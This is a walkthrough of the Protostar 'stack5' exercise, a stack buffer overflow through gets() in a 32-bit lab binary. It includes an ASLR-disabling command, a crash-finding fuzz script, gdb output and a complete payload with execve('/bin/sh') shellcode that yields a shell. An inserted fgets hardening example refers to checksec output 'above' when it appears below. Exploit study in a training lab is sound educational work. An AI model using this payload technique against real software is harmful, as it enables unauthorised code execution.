Protostar Stack 5
Tools and Materials
- Binary: stack5
- Operating system: Debian 9, 64-bit architecture.
Setting Up the Working Environment
- Binary
Fetch the binary from the Protostar VM.
$ scp [email protected]:/opt/protostar/bin/stack5 $PWD
- Source Code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
- Disabling ASLR
Disable ASLR so that exploitation is easier (addresses on the stack stay the same between runs). Use the following command to turn it off:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Identifying the Weakness
$ ./stack5
1
The program reads input from stdin and passes it to the vulnerable gets function, which copies without any length check into a 64-byte stack buffer. The end goal is to fill the stack with shellcode and obtain a shell.
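As an added defensive counterpart (not from the original write-up or the Protostar project), this is how the same 64-byte stack buffer is read safely with fgets instead of gets; the function name read_line_bounded and its return codes are my own choice.

```c
#include <stdio.h>
#include <string.h>

/* Hardened counterpart of stack5's main(): read at most size-1 bytes,
 * never past the end of the array. Returns 0 when the whole line fit,
 * 1 when the line was longer than the buffer and was truncated (the rest
 * of the line is drained so it cannot spill into the next read), and -1
 * on EOF/error with nothing read. */
int read_line_bounded(char *buf, size_t size, FILE *in)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';        /* drop the newline, as gets() did */
        return 0;
    }
    if (feof(in))
        return 0;                   /* last line of input without '\n' */

    /* No newline seen: either the line was exactly size-1 bytes long, or
     * it is longer than the buffer and the remainder must be discarded. */
    int c = fgetc(in);
    if (c == '\n' || c == EOF)
        return 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    return 1;
}

/* Same layout as the original stack5 main(): a 64-byte stack buffer.
 * Build with -fstack-protector-strong and leave NX enabled (the default
 * on current toolchains) so the checksec output above would read differently. */
int main(void)
{
    char buffer[64];
    int rc = read_line_bounded(buffer, sizeof buffer, stdin);
    if (rc == 1)
        fprintf(stderr, "input truncated to %zu bytes\n", sizeof buffer - 1);
    return rc < 0 ? 1 : 0;
}
```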
fsi.sh
#!/bin/bash
# Grow an input of 'A's one byte at a time and feed it to the binary
# given as $1 until it crashes. bash reports a signal death as 128+signal,
# so exit status 139 means SIGSEGV (11).
buffer=""
for i in {1..2048}
do
    echo "$i"
    buffer+="A"
    echo "$buffer" > /tmp/delete.me
    "./$1" < /tmp/delete.me
    if [ $? -eq 139 ]; then
        echo "SEGMENTATION FAULT on $i BUFFER"
        break
    fi
done
Exploitation
$ ./fsi.sh stack5
...
74
75
76
...
SEGMENTATION FAULT on 76 BUFFER
...
With a 76-byte buffer the program hits a segmentation fault. To obtain a shell, place shellcode on the stack at the end of the payload. The shellcode must match the binary's architecture, in this case 32-bit:
$ file stack5
stack5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=13b062326baa245b4c84616ccde1279c97723364, not stripped
$ checksec stack5
[*] '/../stack5'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
For the program to execute the shellcode, the right value for the instruction pointer (EIP) has to be determined. The one-liner below (Python 2 print syntax) uses BBBB as a placeholder for the return address, so the crash shows exactly where EIP lands:
$ python -c 'print "A"*76 + "BBBB" + "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"' > /tmp/del
$ sudo gdb -q stack5
gdb-peda$ r < /tmp/del
Starting program: /../stack5 < /tmp/del
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd660 ('A' <repeats 76 times>, "BBBB", '\220' <repeats 16 times>, "\061\300Ph//shh/bin\211\343PS\211\341\260\v̀")
EBX: 0x0
ECX: 0xfbad2088
EDX: 0xf7fb487c --> 0x0
ESI: 0x1
EDI: 0xf7fb3000 --> 0x1b2db0
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd6b0 --> 0x90909090
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd6b0 --> 0x90909090
0004| 0xffffd6b4 --> 0x90909090
0008| 0xffffd6b8 --> 0x90909090
0012| 0xffffd6bc --> 0x90909090
0016| 0xffffd6c0 --> 0x6850c031
0020| 0xffffd6c4 ("//shh/bin\211\343PS\211\341\260\v̀")
0024| 0xffffd6c8 ("h/bin\211\343PS\211\341\260\v̀")
0028| 0xffffd6cc --> 0x50e3896e
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()
gdb-peda$ x/32x 0xffffd660
0xffffd660: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd670: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd680: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd690: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd6a0: 0x41414141 0x41414141 0x41414141 0x42424242
0xffffd6b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd6c0: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e
0xffffd6d0: 0xb0e18953 0x0080cd0b 0x00000001 0xf7fb3000
At address 0xffffd6c0 the shellcode can be executed by the program, so replace BBBB in the payload with \xc0\xd6\xff\xff (0xffffd6c0 written in little-endian byte order).
$ python -c 'print "A"*76 + "\xc0\xd6\xff\xff" + "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"' > /tmp/shell
gdb-peda$ r < /tmp/shell
Starting program: /../stack5 < /tmp/shell
process 26245 is executing new program: /bin/dash
[Inferior 1 (process 26245) exited normally]
gdb-peda$
Note: the version of the operating system the binary runs on affects the glibc that is loaded, and with it the stack addresses observed here.